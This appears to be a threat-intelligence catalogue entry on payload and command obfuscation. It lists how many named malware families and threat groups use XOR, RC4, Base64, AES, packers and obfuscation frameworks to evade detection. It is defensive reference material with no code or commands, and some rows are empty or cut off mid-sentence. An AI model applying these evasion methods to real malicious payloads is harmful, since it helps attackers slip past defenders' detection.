Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and Deobfuscate/Decode Files or Information for User Execution. The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. [1] Adversaries may also used compressed or archived scripts, such as JavaScript.
Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. [2] Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. [3]
Adversaries may also obfuscate commands executed from payloads or directly via a Command and Scripting Interpreter. Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. [4] [5][6]
ID | Name | Description |
---|---|---|
S0045 | ADVSTORESHELL |
Most of the strings in ADVSTORESHELL are encrypted with an XOR-based algorithm; some strings are also encrypted with 3DES and reversed. API function names are also reversed, presumably to avoid detection in memory.[7][8] |
S0331 | Agent Tesla |
Agent Tesla has had its code obfuscated in an apparent attempt to make analysis difficult.[9] Agent Tesla has used the Rijndael symmetric encryption algorithm to encrypt strings.[10] |
S0504 | Anchor |
Anchor has obfuscated code with stack strings and string encryption.[11] |
S0584 | AppleJeus |
AppleJeus has XOR-encrypted collected system information prior to sending to a C2. AppleJeus has also used the open source ADVObfuscation library for its components.[12] |
S0622 | AppleSeed |
AppleSeed has the ability to Base64 encode its payload and custom encrypt API calls.[13] |
G0099 | APT-C-36 |
APT-C-36 has used ConfuserEx to obfuscate its variant of Imminent Monitor, compressed payload and RAT packages, and password protected encrypted email attachments to avoid detection.[14] |
G0026 | APT18 | |
G0073 | APT19 |
APT19 used Base64 to obfuscate commands and the payload.[16] |
G0007 | APT28 |
APT28 encrypted a .dll payload using RTL and a custom encryption algorithm. APT28 has also obfuscated payloads with base64, XOR, and RC4.[8][17][18][19][20] |
G0016 | APT29 | |
G0022 | APT3 |
APT3 obfuscates files or information to help evade defensive measures.[22] |
G0050 | APT32 |
APT32 uses the Invoke-Obfuscation framework to obfuscate their PowerShell and also performs other code obfuscation. APT32 has also encoded payloads using Base64 and a framework called "Dont-Kill-My-Cat (DKMC). APT32 also encrypts the library used for network exfiltration with AES-256 in CBC mode in their macOS backdoor.[23][24][25][26][27][28][29] |
G0064 | APT33 | |
G0067 | APT37 | |
G0087 | APT39 | |
G0096 | APT41 | |
G0143 | Aquatic Panda |
Aquatic Panda has encoded commands in Base64.[36] |
S0456 | Aria-body |
Aria-body has used an encrypted configuration file for its loader.[37] |
S0373 | Astaroth |
Astaroth obfuscates its JScript code, and has used an XOR-based algorithm to encrypt payloads twice with different keys.[38][39] |
S0438 | Attor |
Strings in Attor's components are encrypted with a XOR cipher, using a hardcoded key and the configuration data, log files and plugins are encrypted using a hybrid encryption scheme of Blowfish-OFB combined with RSA.[40] |
S0347 | AuditCred | |
S0640 | Avaddon | |
S0473 | Avenger |
Avenger has the ability to XOR encrypt files to be sent to C2.[43] |
S0475 | BackConfig |
BackConfig has used compressed and decimal encoded VBS scripts.[44] |
G0135 | BackdoorDiplomacy |
BackdoorDiplomacy has obfuscated tools and malware it uses with VMProtect.[45] |
S0534 | Bazar |
Bazar has used XOR, RSA2, and RC4 encrypted files.[46][47][48] |
S0574 | BendyBear | |
S0268 | Bisonal |
Bisonal's DLL file and non-malicious decoy file are encrypted with RC4 and some function name strings are obfuscated.[50][51] |
S0570 | BitPaymer |
BitPaymer has used RC4-encrypted strings and string hashes to avoid identifiable strings within the binary.[52] |
G0063 | BlackOasis |
BlackOasis's first stage shellcode contains a NOP sled with alternative instructions that was likely designed to bypass antivirus tools.[53] |
S0520 | BLINDINGCAN |
BLINDINGCAN has obfuscated code using Base64 encoding.[54] |
G0108 | Blue Mockingbird |
Blue Mockingbird has obfuscated the wallet address in the payload binary.[55] |
S0657 | BLUELIGHT | |
S0635 | BoomBox |
BoomBox can encrypt data using AES prior to exfiltration.[57] |
S0415 | BOOSTWRITE |
BOOSTWRITE has encoded its payloads using a ChaCha stream cipher with a 256-bit key and 64-bit Initialization vector (IV) to evade detection.[58] |
S0651 | BoxCaon |
BoxCaon used the "StackStrings" obfuscation technique to hide malicious functionalities.[59] |
S0482 | Bundlore |
Bundlore has obfuscated data with base64, AES, RC4, and bz2.[60] |
S0030 | Carbanak |
Carbanak encrypts strings to make analysis more difficult.[61] |
S0484 | Carberp |
Carberp has used XOR-based encryption to mask C2 server locations within the trojan.[62] |
S0335 | Carbon |
Carbon encrypts configuration files and tasks for the malware to complete using CAST-128 algorithm.[63][64] |
S0348 | Cardinal RAT |
Cardinal RAT encodes many of its artifacts and is encrypted (AES-128) when downloaded.[65] |
S0465 | CARROTBALL |
CARROTBALL has used a custom base64 alphabet to decode files.[66] |
S0462 | CARROTBAT |
CARROTBAT has the ability to download a base64 encoded payload and execute obfuscated commands on the infected host.[67] |
G0114 | Chimera | |
S0667 | Chrommme |
Chrommme can encrypt sections of its code to evade detection.[69] |
S0660 | Clambling |
The Clambling executable has been obfuscated when dropped on a compromised host.[70] |
G0080 | Cobalt Group |
Cobalt Group obfuscated several scriptlets and code used on the victim’s machine, including through use of XOR and RC4.[71][72] |
S0154 | Cobalt Strike |
Cobalt Strike can hash functions to obfuscate calls to the Windows API and use a public/private key pair to encrypt Beacon session metadata.[73][74] |
S0369 | CoinTicker |
CoinTicker initially downloads a hidden encoded file.[75] |
S0244 | Comnie | |
S0126 | ComRAT |
ComRAT has used encryption and base64 to obfuscate its orchestrator code in the Registry. ComRAT has also embedded an XOR encrypted communications module inside the orchestrator module. ComRAT has encrypted its virtual file system using AES-256 in XTS mode and has encoded PowerShell scripts.[77][78] |
S0608 | Conficker |
Conficker has obfuscated its code to prevent its removal from host machines.[79] |
S0575 | Conti |
Conti can use compiler-based obfuscation for its code, encrypt DLLs, and hide Windows API calls.[80][81][48] |
S0492 | CookieMiner |
CookieMiner has used base64 encoding to obfuscate scripts on the system.[82] |
S0137 | CORESHELL |
CORESHELL obfuscates strings using a custom stream cipher.[83] |
S0046 | CozyCar |
The payload of CozyCar is encrypted with simple XOR with a rotating key. The CozyCar configuration file has been encrypted with RC4 keys.[84] |
S0625 | Cuba |
Cuba has used multiple layers of obfuscation to avoid analysis, including its Base64 encoded payload.[85] |
S0497 | Dacls | |
G0070 | Dark Caracal |
Dark Caracal has obfuscated strings in Bandook by base64 encoding, and then encrypting them.[87] |
G0012 | Darkhotel |
Darkhotel has obfuscated code using RC4, XOR, and RSA.[88][89] |
S0673 | DarkWatchman |
DarkWatchman has used Base64 to encode PowerShell commands. DarkWatchman has been delivered as compressed RAR payloads in ZIP files to victims.[90] |
S0187 | Daserf |
Daserf uses encrypted Windows APIs and also encrypts data using the alternative base64+RC4 or the Caesar cipher.[91] |
S0354 | Denis |
Denis obfuscates its code and encrypts the API names. Denis also encodes its payload in Base64.[92][27] |
S0659 | Diavol |
Diavol has Base64 encoded the RSA public key used for encrypting files.[93] |
S0213 | DOGCALL | |
S0695 | Donut |
Donut can generate encrypted, compressed/encoded, or otherwise obfuscated code modules.[95] |
S0694 | DRATzarus | |
S0384 | Dridex | |
S0502 | Drovorub |
Drovorub has used XOR encrypted payloads in WebSocket client to server messages.[98] |
S0567 | Dtrack |
Dtrack has used a dropper that embeds an encrypted payload as extra data.[99] |
G0031 | Dust Storm |
Dust Storm has encoded payloads with a single-byte XOR, both skipping the key itself and zeroing in an attempt to avoid exposing the key.[100] |
S0062 | DustySky |
The DustySky dropper uses a function to obfuscate the name of functions and other parts of the malware.[101] |
S0377 | Ebury |
Ebury has obfuscated its strings with a simple XOR encryption with a static key.[102] |
S0593 | ECCENTRICBANDWAGON |
ECCENTRICBANDWAGON has encrypted strings with RC4.[103] |
S0624 | Ecipekac |
Ecipekac can use XOR, AES, and DES to encrypt loader shellcode.[104] |
S0605 | EKANS | |
G0066 | Elderwood |
Elderwood has encrypted documents and malicious executables.[106] |
S0081 | Elise |
Elise encrypts several of its files, including configuration files.[107] |
S0082 | Emissary |
Variants of Emissary encrypt payloads using various XOR ciphers, as well as a custom algorithm that uses the "srand" and "rand" functions.[108][109] |
S0367 | Emotet |
Emotet has obfuscated macros within malicious documents to hide the URLs hosting the malware, CMD.exe arguments, and PowerShell scripts. [110][111][112][113] |
S0363 | Empire |
Empire has the ability to obfuscate commands using |
S0634 | EnvyScout | |
S0091 | Epic |
Epic heavily obfuscates its code to make analysis more difficult.[115] |
S0401 | Exaramel for Linux |
Exaramel for Linux uses RC4 for encrypting the configuration.[116][117] |
S0512 | FatDuke |
FatDuke can use base64 encoding, string stacking, and opaque predicates for obfuscation.[118] |
S0267 | FELIXROOT |
FELIXROOT encrypts strings in the backdoor using a custom XOR algorithm.[119][120] |
G0037 | FIN6 | |
G0046 | FIN7 |
FIN7 has used fragmented strings, environment variables, standard input (stdin), and native character-replacement functionalities to obfuscate commands.[4][122][123] |
G0061 | FIN8 |
FIN8 has used environment variables and standard input (stdin) to obfuscate command-line arguments. FIN8 also obfuscates malicious macros delivered as payloads.[4][124][125] |
S0355 | Final1stspy |
Final1stspy obfuscates strings with base64 encoding.[94] |
S0182 | FinFisher |
FinFisher is heavily obfuscated in many ways, including through the use of spaghetti code in its functions in an effort to confuse disassembly programs. It also uses a custom XOR algorithm to obfuscate code.[126][127] |
S0618 | FIVEHANDS |
The FIVEHANDS payload is encrypted with AES-128.[128][129][130] |
S0696 | Flagpro |
Flagpro has been delivered within ZIP or RAR password-protected archived files.[131] |
S0383 | FlawedGrace |
FlawedGrace encrypts its C2 configuration files with AES in CBC mode.[132] |
S0661 | FoggyWeb | |
G0117 | Fox Kitten |
Fox Kitten has base64 encoded scripts and payloads to avoid detection.[134] |
G0101 | Frankenstein |
Frankenstein has run encoded commands from the command line.[135] |
S0277 | FruitFly | |
S0410 | Fysbis | |
G0093 | GALLIUM |
GALLIUM used a modified version of HTRAN in which they obfuscated strings such as debug messages in an apparent attempt to evade detection.[138] |
G0084 | Gallmaker | |
G0047 | Gamaredon Group |
Gamaredon Group has delivered self-extracting 7z archive files within malicious document attachments, and used obfuscated or encrypted scripts.[140][141][142][143][144] |
S0168 | Gazer |
Gazer logs its actions into files that are encrypted with 3DES. It also uses RSA to encrypt resources.[145] |
S0666 | Gelsemium | |
G0115 | GOLD SOUTHFIELD |
GOLD SOUTHFIELD has executed base64 encoded PowerShell scripts on compromised hosts.[146] |
S0493 | GoldenSpy |
GoldenSpy's uninstaller has base64-encoded its variables. [147] |
S0588 | GoldMax |
GoldMax has written AES-encrypted and Base64-encoded configuration files to disk.[148][149] |
S0477 | Goopy |
Goopy's decrypter have been inflated with junk code in between legitimate API functions, and also included infinite loops to avoid analysis.[27] |
S0531 | Grandoreiro |
The Grandoreiro payload has been delivered encrypted with a custom XOR-based algorithm and also as a base64-encoded ZIP file.[39][150][150] |
S0237 | GravityRAT |
GravityRAT supports file encryption (AES with the key "lolomycin2017").[151] |
S0690 | Green Lambert |
Green Lambert has encrypted strings.[152][153] |
S0342 | GreyEnergy |
GreyEnergy encrypts its configuration files with AES-256 and also encrypts its strings.[120] |
S0632 | GrimAgent |
GrimAgent has used Rotate on Right (RoR) and Rotate on Left (RoL) functionality to encrypt strings.[154] |
G0043 | Group5 |
Group5 disguised its malicious binaries with several layers of obfuscation, including encrypting the files.[155] |
S0132 | H1N1 |
H1N1 uses multiple techniques to obfuscate strings, including XOR.[156] |
S0499 | Hancitor |
Hancitor has used Base64 to encode malicious links. Hancitor has also delivered compressed payloads in ZIP files to victims.[157][158] |
S0391 | HAWKBALL |
HAWKBALL has encrypted the payload with an XOR-based algorithm.[159] |
S0170 | Helminth | |
S0697 | HermeticWiper |
HermeticWiper can compress 32-bit and 64-bit driver files with the Lempel-Ziv algorithm.[161][162][163] |
S0698 | HermeticWizard |
HermeticWizard has the ability to encrypt PE files with a reverse XOR loop.[164] |
S0087 | Hi-Zor |
Hi-Zor uses various XOR techniques to obfuscate its components.[165] |
S0394 | HiddenWasp |
HiddenWasp encrypts its configuration and payload.[166] |
G0126 | Higaisa | |
S0601 | Hildegard | |
S0232 | HOMEFRY | |
G0072 | Honeybee | |
S0431 | HotCroissant |
HotCroissant has encrypted strings with single-byte XOR and base64 encoded RC4.[172] |
S0070 | HTTPBrowser |
HTTPBrowser's code may be obfuscated through structured exception handling and return-oriented programming.[173] |
S0203 | Hydraq |
Hydraq uses basic obfuscation in the form of spaghetti code.[106][174] |
S0398 | HyperBro |
HyperBro can be delivered encrypted to a compromised host.[70] |
S0483 | IcedID |
IcedID has utilzed encrypted binaries and base64 encoded strings.[175] |
S0434 | Imminent Monitor |
Imminent Monitor has encrypted the spearphish attachments to avoid detection from email gateways; the debugger also encrypts information before sending to the C2.[14] |
G0100 | Inception |
Inception has encrypted malware payloads dropped on victim machines with AES and RC4 encryption.[176] |
S0604 | Industroyer |
Industroyer uses heavily obfuscated code in its Windows Notepad backdoor.[177] |
S0259 | InnaputRAT |
InnaputRAT uses an 8-byte XOR key to obfuscate API names and other strings contained in the payload.[178] |
S0260 | InvisiMole |
InvisiMole avoids analysis by encrypting all strings, internal files, configuration data and by using a custom executable format.[179][180] |
S0231 | Invoke-PSImage |
Invoke-PSImage can be used to embed a PowerShell script within the pixels of a PNG file.[181] |
S0581 | IronNetInjector |
IronNetInjector can obfuscate variable names, encrypt strings, as well as base64 encode and Rijndael encrypt payloads.[182] |
S0189 | ISMInjector |
ISMInjector is obfuscated with the off-the-shelf SmartAssembly .NET obfuscator created by red-gate.com.[183] |
S0044 | JHUHUGIT |
Many strings in JHUHUGIT are obfuscated with a XOR algorithm.[184][185][19] |
S0201 | JPIN |
A JPIN uses a encrypted and compressed payload that is disguised as a bitmap within the resource section of the installer.[186] |
S0283 | jRAT |
jRAT’s Java payload is encrypted with AES.[187] Additionally, backdoor files are encrypted using DES as a stream cipher. Later variants of jRAT also incorporated AV evasion methods such as Java bytecode obfuscation via the commercial Allatori obfuscation tool.[188] |
S0265 | Kazuar |
Kazuar is obfuscated using the open source ConfuserEx protector. Kazuar also obfuscates the name of created files/folders/mutexes and encrypts debug messages written to log files using the Rijndael cipher.[189] |
G0004 | Ke3chang | |
S0585 | Kerrdown |
Kerrdown can encrypt, encode, and compress multiple layers of shellcode.[191] |
S0487 | Kessel |
Kessel's configuration is hardcoded and RC4 encrypted within the binary.[192] |
S0387 | KeyBoy |
In one version of KeyBoy, string obfuscation routines were used to hide many of the critical values referenced in the malware.[193] |
S0526 | KGH_SPY | |
S0607 | KillDisk |
KillDisk uses VMProtect to make reverse engineering the malware more difficult.[195] |
G0094 | Kimsuky |
Kimsuky has obfuscated binary strings including the use of XOR encryption and Base64 encoding.[196][197] Kimsuky has also modified the first byte of DLL implants targeting victims to prevent recognition of the executable file format.[198] |
S0641 | Kobalos |
Kobalos encrypts all strings using RC4 and bundles all functionality into a single function call.[199] |
S0669 | KOCTOPUS |
KOCTOPUS has obfuscated scripts with the BatchEncryption tool.[200] |
S0356 | KONNI |
KONNI is heavily obfuscated and includes encrypted configuration files.[201] |
S0236 | Kwampirs |
Kwampirs downloads additional files that are base64-encoded and encrypted with another cipher.[202] |
G0032 | Lazarus Group |
Lazarus Group has used multiple types of encryption and encoding for their payloads, including AES, Caracachs, RC4, XOR, Base64, and other tricks such as creating aliases in code for Native API function names.[203][204][205][206][86][207][208][209][96][210][211] |
G0140 | LazyScripter |
LazyScripter has leveraged the BatchEncryption tool to perform advanced batch obfuscation and encoding techniques.[200] |
G0077 | Leafminer |
Leafminer obfuscated scripts that were used on victim machines.[212] |
G0065 | Leviathan |
Leviathan has obfuscated code using base64 and gzip compression.[213] |
S0395 | LightNeuron |
LightNeuron encrypts its configuration files with AES-256.[214] |
S0447 | Lokibot | |
S0451 | LoudMiner |
LoudMiner has obfuscated various scripts and encrypted DMG files.[216] |
S0409 | Machete |
Machete has used pyobfuscate, zlib compression, and base64 encoding for obfuscation. Machete has also used some visual obfuscation techniques by naming variables as combinations of letters to hinder analysis.[217][218] |
G0059 | Magic Hound |
Magic Hound malware has used base64-encoded commands and files, and has also encrypted embedded strings with AES.[219] |
S0167 | Matryoshka |
Matryoshka obfuscates API function names using a substitute cipher combined with Base64 encoding.[220] |
S0449 | Maze |
Maze has decrypted strings and other important information during the encryption process. Maze also calls certain functions dynamically to hinder analysis.[221] |
S0500 | MCMD |
MCMD can Base64 encode output strings prior to sending to C2.[222] |
G0045 | menuPass |
menuPass has encoded strings in its malware with base64 as well as with a simple, single-byte XOR obfuscation using key 0x40.[223][224][225] |
S0455 | Metamorfo | |
S0339 | Micropsia |
Micropsia obfuscates the configuration with a custom Base64 and XOR.[228][229] |
S0051 | MiniDuke |
MiniDuke can use control flow flattening to obscure code.[118] |
G0103 | Mofang |
Mofang has compressed the ShimRat executable within malicious email attachments. Mofang has also encrypted payloads before they are downloaded to victims.[230] |
G0021 | Molerats |
Molerats has delivered compressed executables within ZIP files to victims.[231] |
S0284 | More_eggs |
More_eggs's payload has been encrypted with a key that has the hostname and processor family information appended to the end.[232] |
S0256 | Mosquito |
Mosquito’s installer is obfuscated with a custom crypter to obfuscate the installer.[233] |
G0069 | MuddyWater |
MuddyWater has used Daniel Bohannon’s Invoke-Obfuscation framework and obfuscated PowerShell scripts.[234][24] The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands.[234][235][236][237][238][239] |
G0129 | Mustang Panda |
Mustang Panda has delivered initial payloads hidden using archives and encoding measures.[240][241][242][243][244][245] |
S0228 | NanHaiShu | |
S0336 | NanoCore |
NanoCore’s plugins were obfuscated with Eazfuscater.NET 3.3.[247] |
S0457 | Netwalker |
Netwalker's PowerShell script has been obfuscated with multiple layers including base64 and hexadecimal encoding and XOR-encryption, as well as obfuscated PowerShell functions and variables. Netwalker's DLL has also been embedded within the PowerShell script in hex format.[248][249] |
S0198 | NETWIRE |
NETWIRE has used a custom obfuscation algorithm to hide strings including Registry keys, APIs, and DLL names.[250] |
G0014 | Night Dragon |
A Night Dragon DLL included an XOR-encoded section.[251] |
S0385 | njRAT | |
S0353 | NOKKI | |
G0049 | OilRig |
OilRig has encrypted and encoded data in its malware, including by using base64.[254][255][256][257][258] |
S0138 | OLDBAIT |
OLDBAIT obfuscates internal strings and unpacks them at startup.[83] |
S0264 | OopsIE |
OopsIE uses the Confuser protector to obfuscate an embedded .Net Framework assembly used for C2. OopsIE also encodes collected data in hexadecimal format before writing to files on disk and obfuscates strings.[259][260] |
G0116 | Operation Wocao |
Operation Wocao has executed PowerShell commands which were encoded or compressed using Base64, zlib, and XOR.[261] |
S0229 | Orz |
Some Orz strings are base64 encoded, such as the embedded DLL known as MockDll.[213] |
S0352 | OSX_OCEANLOTUS.D |
OSX_OCEANLOTUS.D encrypts its strings in RSA256 and encodes them in a custom base64 scheme and XOR.[262] |
S0594 | Out1 | |
S0598 | P.A.S. Webshell |
P.A.S. Webshell can use encryption and base64 encoding to hide strings and to enforce access control once deployed.[117] |
S0664 | Pandora |
Pandora has the ability to compress stings with QuickLZ.[263] |
G0040 | Patchwork |
Patchwork has obfuscated a script with Crypto Obfuscator.[264] |
S0587 | Penquin |
Penquin has encrypted strings in the binary for obfuscation.[265] |
S0517 | Pillowmint |
Pillowmint has been compressed and stored within a registry key. Pillowmint has also obfuscated the AES key used for encryption.[266] |
S0501 | PipeMon | |
S0124 | Pisloader |
Pisloader obfuscates files by splitting strings into smaller sub-strings and including "garbage" strings that are never used. The malware also uses return-oriented programming (ROP) technique and single-byte XOR to obfuscate data.[268] |
S0013 | PlugX |
PlugX can use API hashing and modify the names of strings to evade detection.[70][245] |
S0428 | PoetRAT |
PoetRAT has used a custom encryption scheme for communication between scripts and pyminifier to obfuscate scripts.[269][270] |
S0012 | PoisonIvy |
PoisonIvy hides any strings related to its own indicators of compromise.[271] |
S0518 | PolyglotDuke |
PolyglotDuke can custom encrypt strings.[118] |
S0453 | Pony |
Pony attachments have been delivered via compressed archive files. Pony also obfuscates the memory flow by adding junk instructions when executing to make analysis more difficult.[272] |
S0150 | POSHSPY |
POSHSPY appends a file signature header (randomly selected from six file types) to encrypted data prior to upload or download.[273] |
S0685 | PowerPunch |
PowerPunch can use Base64-encoded scripts.[143] |
S0194 | PowerSploit |
PowerSploit contains a collection of ScriptModification modules that compress and encode scripts and payloads.[274][275] |
S0393 | PowerStallion |
PowerStallion uses a XOR cipher to encrypt command output written to its OneDrive C2 server.[276] |
S0223 | POWERSTATS |
POWERSTATS uses character replacement, PowerShell environment variables, and XOR encoding to obfuscate code. POWERSTATS's backdoor code is a multi-layer obfuscated, encoded, and compressed blob. [235][277] POWERSTATS has used PowerShell code with custom string obfuscation [278] |
S0113 | Prikormka |
Some resources in Prikormka are encrypted with a simple XOR operation or encoded with Base64.[279] |
S0613 | PS1 |
PS1 is distributed as a set of encrypted files and scripts.[280] |
S0147 | Pteranodon |
Pteranodon can use a dynamic Windows hashing algorithm to map API components.[143] |
S0196 | PUNCHBUGGY |
PUNCHBUGGY has hashed most its code's functions and encrypted payloads with base64 and XOR.[281] |
S0197 | PUNCHTRACK |
PUNCHTRACK is loaded and executed by a highly obfuscated launcher.[282] |
G0024 | Putter Panda |
Droppers used by Putter Panda use RC4 or a 16-byte XOR key consisting of the bytes 0xA0 – 0xAF to obfuscate payloads.[283] |
S0650 | QakBot |
QakBot can use obfuscated and encoded scripts; it has also hidden code within Excel spreadsheets by turning the font color to white and splitting it across multiple cells.[284] |
S0269 | QUADAGENT |
QUADAGENT was likely obfuscated using Invoke-Obfuscation.[255][24] |
S0565 | Raindrop |
Raindrop encrypted its payload using a simple XOR algorithm with a single-byte key.[285][286] |
S0629 | RainyDay | |
S0458 | Ramsay |
Ramsay has base64-encoded its portable executable and hidden itself under a JPG header. Ramsay can also embed information within document footers.[288] |
S0662 | RCSession |
RCSession can compress and obfuscate its strings to evade detection on a compromised host.[70] |
S0172 | Reaver | |
S0153 | RedLeaves |
A RedLeaves configuration file is encrypted with a simple XOR key, 0x53.[290] |
S0511 | RegDuke |
RegDuke can use control-flow flattening or the commercially available .NET Reactor for obfuscation.[118] |
S0332 | Remcos |
Remcos uses RC4 and base64 to obfuscate data, including Registry entries and file paths.[291] |
S0375 | Remexi | |
S0125 | Remsec |
Some data in Remsec is encrypted using RC5 in CBC mode, AES-CBC with a hardcoded key, RC4, or Salsa20. Some data is also base64-encoded.[293][294] |
S0496 | REvil |
REvil has used encrypted strings and configuration files.[295][296][297][298][299][300][301] |
S0433 | Rifdoor |
Rifdoor has encrypted strings with a single byte XOR algorithm.[172] |
S0448 | Rising Sun |
Configuration data used by Rising Sun is encrypted using RC4.[302] |
G0106 | Rocke |
Rocke has modified UPX headers after packing files to break unpackers.[303] |
S0270 | RogueRobin |
The PowerShell script with the RogueRobin payload was obfuscated using the COMPRESS technique in Invoke-Obfuscation.[304][24] |
S0240 | ROKRAT |
ROKRAT can encrypt data prior to exfiltration by using an RSA public key.[33][305] |
S0148 | RTM |
RTM strings, network data, configuration, and modules are encrypted with a modified RC4 algorithm. RTM has also been delivered to targets as various archive files including ZIP, 7-ZIP, and RAR.[306][307] |
S0446 | Ryuk |
Ryuk can use anti-disassembly and code transformation obfuscation techniques.[48] |
S0074 | Sakula |
Sakula uses single-byte XOR obfuscation to obfuscate many of its files.[308] |
S0370 | SamSam |
SamSam has been seen using AES or DES to encrypt payloads and payload components.[309][310] |
G0034 | Sandworm Team |
Sandworm Team has used Base64 encoding within malware variants. Sandworm Team has also used ROT13 encoding, AES encryption and compression with the zlib library for their Python-based backdoor.[311][312] |
S0461 | SDBbot |
SDBbot has the ability to XOR the strings for its installer component with a hardcoded 128 byte key.[313] |
S0345 | Seasalt | |
S0596 | ShadowPad |
ShadowPad has encrypted a virtual file system and various files.[315] |
S0140 | Shamoon | |
S0450 | SHARPSTATS |
SHARPSTATS has used base64 encoding and XOR to obfuscate PowerShell scripts.[278] |
S0444 | ShimRat |
ShimRat has been delivered as a package that includes compressed DLL and shellcode payloads within a .dat file.[230] |
S0445 | ShimRatReporter |
ShimRatReporter encrypted gathered information with a combination of shifting and XOR using a static key.[230] |
S0063 | SHOTPUT |
SHOTPUT is obscured using XOR encoding and appended to a valid GIF file.[317][318] |
S0589 | Sibot | |
G0121 | Sidewinder |
Sidewinder has used base64 encoding and ECDH-P256 encryption for scripts and files.[319][320][321] |
G0091 | Silence |
Silence has used environment variable string substitution for obfuscation.[322] |
S0623 | Siloscape |
Siloscape itself is obfuscated and uses obfuscated API calls.[323] |
S0468 | Skidmap | |
S0633 | Sliver | |
S0226 | Smoke Loader |
Smoke Loader uses a simple one-byte XOR method to obfuscate values in the malware.[327][328] |
S0649 | SMOKEDHAM |
The SMOKEDHAM source code is embedded in the dropper as an encrypted string.[329] |
S0627 | SodaMaster |
SodaMaster can use "stackstrings" for obfuscation.[104] |
S0615 | SombRAT |
SombRAT can encrypt strings with XOR-based routines and use a custom AES storage format for plugins, configuration, C2 domains, and harvested data.[280][128][129] |
S0516 | SoreFang |
SoreFang has the ability to encode and RC6 encrypt data sent to C2.[330] |
S0374 | SpeakUp | |
S0390 | SQLRat |
SQLRat has used a character insertion obfuscation technique, making the script appear to contain Chinese characters.[332] |
S0380 | StoneDrill |
StoneDrill has obfuscated its module with an alphabet-based table or XOR encryption.[333] |
S0142 | StreamEx |
StreamEx obfuscates some commands by using statically programmed fragments of strings when starting a DLL. It also uses a one-byte xor against 0x91 to encode configuration data.[334] |
S0491 | StrongPity |
StrongPity has used encrypted strings in its dropper component.[335][336] |
S0603 | Stuxnet |
Stuxnet uses encrypted configuration blocks and writes encrypted files to disk.[337] |
S0559 | SUNBURST |
SUNBURST strings were compressed and encoded in Base64.[338] SUNBURST also obfuscated collected system information using a FNV-1a + XOR algorithm.[339] |
S0562 | SUNSPOT |
SUNSPOT encrypted log entries it collected with the stream cipher RC4 using a hard-coded key. It also uses AES128-CBC encrypted blobs for SUNBURST source code and data extracted from the SolarWinds Orion |
S0578 | SUPERNOVA | |
S0242 | SynAck |
SynAck payloads are obfuscated prior to compilation to inhibit analysis and/or reverse engineering.[342][343] |
S0663 | SysUpdate |
SysUpdate can encrypt and encode its configuration file.[263] |
G0092 | TA505 |
TA505 has password-protected malicious Word documents and used base64 encoded PowerShell commands.[344][345][346] |
G0127 | TA551 |
TA551 has used obfuscated variable names in a JavaScript configuration file.[347] |
S0011 | Taidoor |
Taidoor can use encrypted string blocks for obfuscation.[348] |
S0467 | TajMahal |
TajMahal has used an encrypted Virtual File System to store plugins.[349] |
G0139 | TeamTNT |
TeamTNT has encrypted its binaries via AES.[350] TeamTNT has also encoded files using Base64.[351] |
S0560 | TEARDROP |
TEARDROP created and read from a file with a fake JPG header, and its payload was encrypted with a simple rotating XOR cipher.[339][352][286] |
G0027 | Threat Group-3390 |
A Threat Group-3390 tool can encrypt payloads using XOR. Threat Group-3390 malware is also obfuscated using Metasploit’s shikata_ga_nai encoder as well as compressed with LZNT1 compression.[353][354][355] |
S0665 | ThreatNeedle |
ThreatNeedle has been compressed and obfuscated using RC4, AES, or XOR.[356] |
S0131 | TINYTYPHON |
TINYTYPHON has used XOR with 0x90 to obfuscate its configuration file.[357] |
S0678 | Torisma | |
G0134 | Transparent Tribe |
Transparent Tribe has dropped encoded executables on compromised hosts.[358] |
S0266 | TrickBot |
TrickBot uses non-descriptive names to hide functionality and uses an AES CBC (256 bits) encryption algorithm for its loader and configuration files.[359] |
S0609 | TRITON |
TRITON encoded the two inject.bin and imain.bin payloads.[360] |
S0094 | Trojan.Karagany |
Trojan.Karagany can base64 encode and AES-128-CBC encrypt data prior to transmission.[361] |
G0081 | Tropic Trooper |
Tropic Trooper has encrypted configuration files.[362][363] |
S0647 | Turian | |
G0010 | Turla |
Turla has used encryption (including salted 3DES via PowerSploit's |
S0263 | TYPEFRAME |
APIs and strings in some TYPEFRAME variants are RC4 encrypted. Another variant is encoded with XOR.[364] |
S0333 | UBoatRAT |
UBoatRAT encrypts instructions in the payload using a simple XOR cipher.[365] |
S0386 | Ursnif |
Ursnif has used an XOR-based algorithm to encrypt Tor clients dropped to disk.[366] Ursnif droppers have also been delivered as password-protected zip files that execute base64 encoded PowerShell commands.[367] |
S0136 | USBStealer |
Most strings in USBStealer are encrypted using 3DES and XOR and reversed.[368] |
S0476 | Valak |
Valak has the ability to base64 encode and XOR encrypt strings.[369][347][370] |
S0257 | VERMIN |
VERMIN is obfuscated using the obfuscation tool called ConfuserEx.[371] |
S0180 | Volgmer |
A Volgmer variant is encoded using a simple XOR cipher.[372] |
S0612 | WastedLocker |
The WastedLocker payload includes encrypted strings stored within the .bss section of the binary file.[373] |
S0579 | Waterbear |
Waterbear has used RC4 encrypted shellcode and encrypted functions.[374] |
S0689 | WhisperGate |
WhisperGate can Base64 encode strings, store downloaded files in reverse byte order, and use the Eazfuscator tool to obfuscate its third stage.[375][376] |
G0107 | Whitefly | |
G0112 | Windshift |
Windshift has used string encoding with floating point calculations.[378] |
S0466 | WindTail |
WindTail can be delivered as a compressed, encrypted, and encoded payload.[379] |
S0430 | Winnti for Linux |
Winnti for Linux can encode its configuration file with single-byte XOR encoding.[380] |
S0141 | Winnti for Windows |
Winnti for Windows has the ability to encrypt and compress its payload.[381] |
G0102 | Wizard Spider |
Wizard Spider used Base64 encoding to obfuscate an Empire service and PowerShell commands.[382][383] |
S0117 | XTunnel |
A version of XTunnel introduced in July 2015 obfuscated the binary using opaque predicates and other techniques in a likely attempt to obfuscate it and bypass security products.[384] |
S0388 | YAHOYAH |
YAHOYAH encrypts its configuration file using a simple algorithm.[385] |
S0230 | ZeroT | |
S0330 | Zeus Panda |
